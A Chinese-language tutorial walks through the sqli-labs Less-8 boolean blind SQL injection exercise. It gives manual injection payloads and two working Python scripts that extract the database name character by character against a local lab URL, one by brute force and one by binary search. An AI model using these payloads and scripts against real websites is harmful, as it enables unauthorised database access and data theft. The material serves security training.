sql注入第八关卡是布尔盲注，我们将看不到一般的返回值，只能通过You are in......的消失与否来判断自己输入的字符是否与查询的数据的字符相同，相同则显示You are in......，相反则不显示，如下图所示：

查询语句：id=1' and substr(database(),1,1) = 's' --+

相同时：

查询语句：id=1' and substr(database(),1,1) = 'a' --+

不同时：

因为这样一次一次的去输入，去判断，所需时间确实太久了，所以用脚本来实现是最好的

import requests


def get_database(url):
    name = ''  # 初始化一个空字符串用于存储数据库名
    letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@#$%^&*'  # 包含可能的字符列表

    # 循环每个数据库名的字符位置
    for i in range(1, 20):  # 假设数据库名最长为20个字符
        # 循环尝试每个可能的字符
        for j in letters:
            # 构造盲注payload
            payload = "1' AND SUBSTRING((SELECT DATABASE()), %d, 1) = '%s'-- " % (i, j)
            # 发送请求
            res = requests.get(url, params={"id": payload})
            # 检查响应是否包含特定字符串，即数据库名
            if "You are in" in res.text:
                # 找到一个字符后，将其添加到数据库名中
                name += j
                print(name)  # 打印当前已获取的数据库名
                break  # 跳出当前循环，继续下一个位置的字符

    return name


# 目标URL
url = 'http://127.0.0.1/sqli-labs/less-8/'
# 调用函数获取数据库名
db_name = get_database(url)
print("Database Name:", db_name)

效果：

可这个效率依旧太差了，因为代码中有两个for循环，大大增加了查询时间，因此我们用二分查找来增加脚本效率

import requests

def get_database(url):
    name = ''
    for i in range(1,10):
        low = 32
        high = 128
        mid = (high + low) // 2
        while low < high:
            payload = "?id=1' and ascii(substr(database(),%d,1)) > %d--+" % (i,mid)
            res = requests.get(url + payload)
            if "You are in" in res.text:
                low = mid + 1
            else:
                high = mid
            mid = low + (high - low) // 2
        if mid == 32:
            break
        name = name + chr(mid)
    print(name)
    return name


url = 'http://127.0.0.1/sqli-labs/less-8/'
db_name = get_database(url)
print("Dataname是：",db_name)